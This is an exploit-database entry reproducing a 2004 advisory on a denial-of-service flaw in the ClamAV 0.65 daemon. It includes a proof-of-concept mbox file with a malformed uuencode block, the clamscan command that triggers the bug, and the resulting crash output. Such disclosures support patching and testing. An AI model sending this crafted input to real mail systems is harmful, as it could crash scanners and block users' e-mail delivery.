ClamAV Daemon 0.65 Malformed UUEncoded Message Denial of Service Vulnerability

2004-02-09T00:00:00
ID EDB-ID:23667
Type exploitdb
Reporter Oliver Eikemeier
Modified 2004-02-09T00:00:00

Description

ClamAV Daemon 0.65 Malformed UUEncoded Message Denial Of Service Vulnerability. CVE-2004-0270. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/9610/info

A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users.

Save the following file to ~/clamtest.mbox:

From -

begin 644 byebye
byebye
end

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)